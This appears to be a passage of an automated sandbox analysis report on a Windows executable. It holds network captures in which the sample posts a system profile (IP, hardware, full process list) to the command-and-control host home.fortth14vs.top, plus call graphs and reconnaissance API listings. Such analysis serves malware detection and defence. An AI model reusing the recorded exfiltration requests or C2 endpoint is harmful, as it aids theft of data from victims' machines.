                                        Dec 31, 2024 15:42:11.990184069 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990194082 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990256071 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990266085 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990276098 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990288973 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990302086 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990313053 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990381002 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990396976 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990403891 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990411043 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990462065 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990541935 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990551949 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990561008 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990571022 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990592957 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990596056 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990597010 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990598917 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990612984 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990669966 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990679979 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.990689993 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:14.032013893 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:14.032592058 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:14.037657976 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:14.037735939 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:14.765713930 CET4971380192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:14.770584106 CET804971334.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:14.770665884 CET4971380192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:14.770884991 CET4971380192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:14.775604963 CET804971334.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:15.399163961 CET804971334.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:15.399647951 CET4971380192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:15.404545069 CET804971334.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:15.404623985 CET4971380192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:15.467688084 CET4971453192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:15.472505093 CET53497141.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:15.472580910 CET4971453192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:15.472764015 CET4971453192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:15.477504969 CET53497141.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:16.406032085 CET53497141.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:16.406805038 CET4971453192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:16.407119036 CET4971580192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:16.411792994 CET53497141.1.1.1192.168.2.3
                                        Dec 31, 2024 15:42:16.411911011 CET804971534.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:16.412003040 CET4971453192.168.2.31.1.1.1
                                        Dec 31, 2024 15:42:16.412188053 CET4971580192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:16.412415981 CET4971580192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:16.417161942 CET804971534.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:17.134371996 CET804971534.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:17.134804010 CET4971580192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:17.139899969 CET804971534.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:17.139974117 CET4971580192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:37.939227104 CET5444653192.168.2.3162.159.36.2
                                        Dec 31, 2024 15:42:37.944106102 CET5354446162.159.36.2192.168.2.3
                                        Dec 31, 2024 15:42:37.944210052 CET5444653192.168.2.3162.159.36.2
                                        Dec 31, 2024 15:42:37.949034929 CET5354446162.159.36.2192.168.2.3
                                        Dec 31, 2024 15:42:38.392019033 CET5444653192.168.2.3162.159.36.2
                                        Dec 31, 2024 15:42:38.397005081 CET5354446162.159.36.2192.168.2.3
                                        Dec 31, 2024 15:42:38.397067070 CET5444653192.168.2.3162.159.36.2
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 31, 2024 15:42:08.268982887 CET  57370        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:08.269068956 CET  57370        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:08.275932074 CET  53           57370      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:08.276026011 CET  53           57370      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:10.601010084 CET  57373        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:10.601079941 CET  57373        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:11.517528057 CET  53           57373      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:11.517716885 CET  53           57373      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:14.087248087 CET  57375        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:14.087338924 CET  57375        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:14.764789104 CET  53           57375      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:14.764806032 CET  53           57375      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:15.460525036 CET  57377        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:15.460596085 CET  57377        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:15.467133999 CET  53           57377      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:16.046791077 CET  53           57377      1.1.1.1         192.168.2.3
Dec 31, 2024 15:42:37.938611031 CET  53           52423      162.159.36.2    192.168.2.3
Dec 31, 2024 15:42:38.410310984 CET  61336        53         192.168.2.3     1.1.1.1
Dec 31, 2024 15:42:38.417468071 CET  53           61336      1.1.1.1         192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 15:42:08.268982887 CET | 192.168.2.3 | 1.1.1.1 | 0x39fd | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:08.269068956 CET | 192.168.2.3 | 1.1.1.1 | 0xd2a8 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 31, 2024 15:42:10.601010084 CET | 192.168.2.3 | 1.1.1.1 | 0x2813 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:10.601079941 CET | 192.168.2.3 | 1.1.1.1 | 0xc6dd | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
Dec 31, 2024 15:42:14.087248087 CET | 192.168.2.3 | 1.1.1.1 | 0x887 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:14.087338924 CET | 192.168.2.3 | 1.1.1.1 | 0x1811 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
Dec 31, 2024 15:42:15.460525036 CET | 192.168.2.3 | 1.1.1.1 | 0x585e | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:15.460596085 CET | 192.168.2.3 | 1.1.1.1 | 0x9b96 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false
Dec 31, 2024 15:42:15.472764015 CET | 192.168.2.3 | 1.1.1.1 | 0x585e | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:38.410310984 CET | 192.168.2.3 | 1.1.1.1 | 0x49c5 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 15:42:08.276026011 CET | 1.1.1.1 | 192.168.2.3 | 0x39fd | No error (0) | httpbin.org | | 34.197.122.172 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:08.276026011 CET | 1.1.1.1 | 192.168.2.3 | 0x39fd | No error (0) | httpbin.org | | 34.200.57.114 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:11.517528057 CET | 1.1.1.1 | 192.168.2.3 | 0x2813 | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:14.764789104 CET | 1.1.1.1 | 192.168.2.3 | 0x887 | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:16.406032085 CET | 1.1.1.1 | 192.168.2.3 | 0x585e | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:42:38.417468071 CET | 1.1.1.1 | 192.168.2.3 | 0x49c5 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                        • httpbin.org
                                        • home.fortth14vs.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 49712 | 34.147.147.173 | 80 | 5512 | C:\Users\user\Desktop\XJiB3BdLTg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 15:42:11.555784941 CET | 12360 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
Host: home.fortth14vs.top
Accept: */*
Content-Type: application/json
Content-Length: 502792
Data Ascii: { "ip": "8.46.123.189", "current_time": "8472961288278115008", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 380 }, { "name": "svchost.exe", "pid": 684 }, { "name": "svchost.exe", "pid": 892 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 15:42:14.032013893 CET | 138 | IN | HTTP/1.1 200 OK
server: nginx/1.22.1
date: Tue, 31 Dec 2024 14:42:13 GMT
content-type: text/html; charset=utf-8
content-length: 1
Data Raw: 30
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.3 | 49713 | 34.147.147.173 | 80 | 5512 | C:\Users\user\Desktop\XJiB3BdLTg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 15:42:14.770884991 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
Host: home.fortth14vs.top
Accept: */*
Dec 31, 2024 15:42:15.399163961 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
server: nginx/1.22.1
date: Tue, 31 Dec 2024 14:42:15 GMT
content-type: text/html; charset=utf-8
content-length: 207
Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.3 | 49715 | 34.147.147.173 | 80 | 5512 | C:\Users\user\Desktop\XJiB3BdLTg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 15:42:16.412415981 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
Host: home.fortth14vs.top
Accept: */*
Content-Type: application/json
Content-Length: 31
Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 15:42:17.134371996 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
server: nginx/1.22.1
date: Tue, 31 Dec 2024 14:42:17 GMT
content-type: text/html; charset=utf-8
content-length: 207
Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 49711 | 34.197.122.172 | 443 | 5512 | C:\Users\user\Desktop\XJiB3BdLTg.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:42:08 UTC | 52 | OUT | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-31 14:42:09 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 14:42:09 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-31 14:42:09 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}


                                        Target ID:0
                                        Start time:09:42:06
                                        Start date:31/12/2024
                                        Path:C:\Users\user\Desktop\XJiB3BdLTg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\XJiB3BdLTg.exe"
                                        Imagebase:0x1c0000
                                        File size:4'471'296 bytes
                                        MD5 hash:767F4AFF1A89B1ABFE6A843F7750BD5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:2.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:14.6%
                                          Total number of Nodes:594
                                          Total number of Limit Nodes:96
68004->68024 68028 2771c0 68004->68028 68008 276f35 68007->68008 68014 277019 68008->68014 68066 28a870 68008->68066 68010 276f4e 68012 27702d 68010->68012 68015 276f61 68010->68015 68016 27701d 68012->68016 68070 276d50 localeconv localeconv 68012->68070 68071 289320 closesocket 68014->68071 68015->68016 68017 2771c0 7 API calls 68015->68017 68018 277082 68015->68018 68016->67986 68017->68015 68072 276d50 localeconv localeconv 68018->68072 68020->67983 68021->67985 68022->67985 68023->67980 68025 28a903 recvfrom 68024->68025 68026 28a8e6 68024->68026 68027 28a8ed 68025->68027 68026->68025 68026->68027 68027->68004 68029 2771e6 68028->68029 68031 2773e3 68029->68031 68032 2773c9 68029->68032 68037 2771f2 68029->68037 68033 27740d 68031->68033 68035 277417 68031->68035 68032->68037 68040 276050 68032->68040 68049 276d50 localeconv localeconv 68033->68049 68035->68037 68048 27c2d0 localeconv localeconv 68035->68048 68037->68004 68038->68003 68039->68001 68041 2760d9 68040->68041 68050 28aa30 68041->68050 68043 2762fc 68062 276d50 localeconv localeconv 68043->68062 68045 2764a4 68046 276050 7 API calls 68045->68046 68047 276506 68045->68047 68046->68047 68047->68037 68048->68037 68049->68037 68051 28aa5f 68050->68051 68052 28ab96 socket 68051->68052 68054 28ab75 68051->68054 68061 28ab04 68051->68061 68052->68054 68052->68061 68053 28abd0 ioctlsocket 68055 28abef 68053->68055 68054->68053 68058 28ad2e 68054->68058 68054->68061 68057 28ad0a setsockopt 68055->68057 68055->68058 68055->68061 68056 28ada0 connect 68056->68058 68057->68058 68057->68061 68058->68056 68059 28ade1 68058->68059 68058->68061 68059->68061 68063 28af70 68059->68063 68061->68043 68062->68045 68064 28af93 getsockname 68063->68064 68065 28af8d 68063->68065 68064->68065 68065->68061 68067 28a8aa recv 68066->68067 68068 28a88c 68066->68068 68067->68010 68068->68067 68069 28a893 68068->68069 68069->68010 68070->68014 68071->68016 68072->68014 67657 1c13c9 67659 1c1160 67657->67659 67661 1c13a1 
67659->67661 67662 5493e0 67659->67662 67672 548a20 15 API calls 67659->67672 67663 549400 67662->67663 67671 5493f3 67662->67671 67664 549688 67663->67664 67665 5496c7 67663->67665 67669 549280 vfprintf 67663->67669 67670 549220 vfprintf 67663->67670 67663->67671 67664->67665 67664->67671 67673 549280 vfprintf 67664->67673 67674 549220 vfprintf 67665->67674 67668 5496df 67668->67659 67669->67663 67670->67663 67671->67659 67672->67659 67673->67664 67674->67668 67675 68fa30 67676 68fa5a 67675->67676 67677 68fa66 67676->67677 67678 548f70 _open 67676->67678 67679 68fa6f 67678->67679 67691 5512c0 67679->67691 67682 68faa6 67683 548f70 _open 67684 68faaf 67683->67684 67685 68fb50 67684->67685 67686 68fb06 67684->67686 67695 54b500 localeconv localeconv 67685->67695 67687 68fb44 67686->67687 67696 54b500 localeconv localeconv 67686->67696 67689 68fb79 67692 5512cc 67691->67692 67697 54e050 67692->67697 67694 5512fa 67694->67682 67694->67683 67695->67689 67696->67689 67698 54e09d localeconv localeconv 67697->67698 67707 54e503 67697->67707 67702 54e0ce 67698->67702 67699 54e18e 67700 54ed90 ungetc 67699->67700 67709 54e1a6 67699->67709 67700->67709 67701 550250 ungetc 67701->67707 67702->67699 67706 54e388 67702->67706 67702->67707 67708 54e243 67702->67708 67702->67709 67703 550742 ungetc 67703->67709 67704 5511a4 ungetc 67704->67707 67705 5508d7 ungetc 67705->67707 67706->67707 67706->67709 67713 5500b8 ungetc 67706->67713 67707->67701 67707->67704 67707->67705 67707->67708 67707->67709 67710 550e3e ungetc 67707->67710 67712 550006 ungetc 67707->67712 67714 54b1a0 islower islower 67707->67714 67708->67703 67708->67709 67709->67694 67710->67707 67712->67707 67713->67706 67714->67707 68073 1dd5e0 68074 1dd5f0 68073->68074 68075 1dd652 WSAStartup 68073->68075 68078 1dd67c 68074->68078 68080 1dd690 _open localeconv localeconv 68074->68080 68075->68074 68076 1dd664 68075->68076 68079 1dd5fa 68080->68079 67715 1fb400 67716 1fb40b 67715->67716 67717 1fb425 67715->67717 67720 
1c7770 67716->67720 67718 1fb421 67721 1c77b6 recv 67720->67721 67722 1c7790 67720->67722 67724 1c77a3 67721->67724 67730 1c77d4 67721->67730 67722->67721 67723 1c7799 67722->67723 67723->67724 67725 1c77db 67723->67725 67731 1c72a0 _open localeconv localeconv 67724->67731 67732 1c72a0 _open localeconv localeconv 67725->67732 67728 1c77ec 67733 1ccb20 _open localeconv localeconv 67728->67733 67730->67718 67731->67730 67732->67728 67733->67730 67734 1fe400 67735 1fe412 67734->67735 67739 1fe459 67734->67739 67736 1fe422 67735->67736 67758 213030 _open localeconv localeconv 67735->67758 67759 2209d0 _open localeconv localeconv 67736->67759 67741 1fe4a8 67739->67741 67744 1fe495 67739->67744 67746 1fb5a0 67739->67746 67740 1fe42b 67760 1f68b0 closesocket _open localeconv localeconv 67740->67760 67744->67741 67745 1fb5a0 3 API calls 67744->67745 67745->67741 67747 1fb5d2 67746->67747 67748 1fb5c0 67746->67748 67747->67744 67748->67747 67749 1fb713 67748->67749 67752 1fb626 67748->67752 67762 204f40 _open localeconv localeconv 67749->67762 67751 1fb65a 67751->67747 67753 1fb72b 67751->67753 67754 1fb737 67751->67754 67752->67747 67752->67751 67752->67753 67752->67754 67761 2050a0 _open localeconv localeconv 67752->67761 67753->67747 67763 2050a0 _open localeconv localeconv 67753->67763 67754->67747 67764 2050a0 _open localeconv localeconv 67754->67764 67758->67736 67759->67740 67760->67739 67761->67752 67762->67747 67763->67747 67764->67747 67765 1ff100 67766 1ff1b8 67765->67766 67768 1ff11f 67765->67768 67767 1fff1a 67808 200c80 _open localeconv localeconv 67767->67808 67768->67766 67770 1ff2a3 67768->67770 67776 1ff603 67768->67776 67784 1ff240 67768->67784 67800 204f40 _open localeconv localeconv 67770->67800 67772 200045 67772->67766 67775 20010d 67772->67775 67780 20004d 67772->67780 67811 2050a0 _open localeconv localeconv 67772->67811 67773 1ff80d 67778 20015e 67775->67778 67812 2050a0 _open localeconv localeconv 67775->67812 67776->67767 67776->67772 
67776->67773 67777 20008a 67776->67777 67794 200d30 _open localeconv localeconv 67776->67794 67798 2050a0 _open localeconv localeconv 67776->67798 67806 1cfa50 _open localeconv localeconv 67776->67806 67807 204fd0 _open localeconv localeconv 67776->67807 67810 204f40 _open localeconv localeconv 67777->67810 67778->67780 67813 2050a0 _open localeconv localeconv 67778->67813 67814 204f40 _open localeconv localeconv 67780->67814 67781 1fff5b 67781->67766 67809 2050a0 _open localeconv localeconv 67781->67809 67784->67766 67801 1c7310 _open localeconv localeconv 67784->67801 67788 1ff491 67788->67776 67803 1c7310 _open localeconv localeconv 67788->67803 67792 1ff3ce 67792->67766 67792->67788 67802 2050a0 _open localeconv localeconv 67792->67802 67794->67776 67795 1ff5b9 67805 1cfa50 _open localeconv localeconv 67795->67805 67797 1ff50d 67797->67766 67797->67795 67804 2050a0 _open localeconv localeconv 67797->67804 67798->67776 67800->67766 67801->67792 67802->67788 67803->67797 67804->67795 67805->67776 67806->67776 67807->67776 67808->67781 67809->67766 67810->67766 67811->67775 67812->67778 67813->67780 67814->67766 67815 1fb3c0 67816 1fb3ee 67815->67816 67817 1fb3cb 67815->67817 67819 1c76a0 4 API calls 67817->67819 67821 1f9290 67817->67821 67818 1fb3ea 67819->67818 67822 1c76a0 4 API calls 67821->67822 67823 1f92e5 67822->67823 67824 1f93c3 67823->67824 67826 1f92f3 67823->67826 67829 1f9392 67824->67829 67835 1dd090 _open localeconv localeconv 67824->67835 67825 1f93be 67825->67818 67826->67829 67830 1f9335 WSAIoctl 67826->67830 67828 1f93f7 67836 204f40 _open localeconv localeconv 67828->67836 67829->67825 67837 2050a0 _open localeconv localeconv 67829->67837 67830->67829 67833 1f9366 67830->67833 67833->67829 67834 1f9371 setsockopt 67833->67834 67834->67829 67835->67828 67836->67829 67837->67825
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                          • API String ID: 0-1590685507
                                          • Opcode ID: 31ac787cec5443bbf8ad3c2c5b2f9a368823d39c03cd21d788e4ec432d9fb363
                                          • Instruction ID: 069d6763cb6f7f6941e99395987fbe2215dd83c1a02f7c6dbaea677989b4863e
                                          • Opcode Fuzzy Hash: 31ac787cec5443bbf8ad3c2c5b2f9a368823d39c03cd21d788e4ec432d9fb363
                                          • Instruction Fuzzy Hash: 09C2B431A043499FD724CF28C484B6AB7E1BF84314F05C66DED999B2A2D7B1ED85CB81

                                          Control-flow Graph

                                          APIs
                                          • GetSystemInfo.KERNELBASE ref: 001C2579
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 001C25CC
                                          • GetDriveTypeA.KERNELBASE ref: 001C2647
                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 001C267E
                                          • KiUserCallbackDispatcher.NTDLL ref: 001C27E2
                                          • SHGetKnownFolderPath.SHELL32 ref: 001C286D
                                          • FindFirstFileW.KERNELBASE ref: 001C28F8
                                          • FindNextFileW.KERNELBASE ref: 001C291F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                          • String ID: 7z$@$}z
                                          • API String ID: 2066228396-2556700916
                                          • Opcode ID: 6c981d745bdcbdfa50ce134a1c44e7d9279b8933dbbddfe1b12f14ea0581de7e
                                          • Instruction ID: 010ce07d880eac6b93e85e8baf0f8cfc5ab255416407b9be0189ea044d36a9ba
                                          • Opcode Fuzzy Hash: 6c981d745bdcbdfa50ce134a1c44e7d9279b8933dbbddfe1b12f14ea0581de7e
                                          • Instruction Fuzzy Hash: E5D1C5B49043099FCB40EF68C98569EBBF5BF89344F10896DE898DB301E7349A94DF52

                                          Control-flow Graph
                                          [Control-flow graph image omitted; API calls shown in the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle]
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                          • String ID: 0$wz
                                          • API String ID: 2406880114-1130733895
                                          • Opcode ID: 3feea410164af276a78a63b385f81e400298f959fba8a9b7270ac613084d841d
                                          • Instruction ID: bb4ba0fc015ae5fb0100c6b946403e66dfbeac4d2c537c0ff3aac22547f614a5
                                          • Opcode Fuzzy Hash: 3feea410164af276a78a63b385f81e400298f959fba8a9b7270ac613084d841d
                                          • Instruction Fuzzy Hash: 81E104B09053098FCB50EF68D98469DBBF5AF95344F10896DE898DB340EB78DA94CF42

                                          Control-flow Graph
                                          [Control-flow graph image omitted; API calls shown in the graph: WSAEventSelect, WSAEnumNetworkEvents]
                                          APIs
                                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 001D0712
                                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001D09DC
                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001D09FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: EventSelect$EnumEventsNetwork
                                          • String ID: multi.c
                                          • API String ID: 2170980988-214371023
                                          • Opcode ID: 6db8ed2ff3d0ea0a4e8df0f2c1f79908417a86e5fbab9ef886119bf13b93e685
                                          • Instruction ID: ecab106f31d40b378567f4f8d7b3e88065dfafb8c8a1ca71079c717b78889255
                                          • Opcode Fuzzy Hash: 6db8ed2ff3d0ea0a4e8df0f2c1f79908417a86e5fbab9ef886119bf13b93e685
                                          • Instruction Fuzzy Hash: FCD1AE756083019FE712DF64C891BAFB7E5FF98348F04482EF98486242E7B4E958DB52

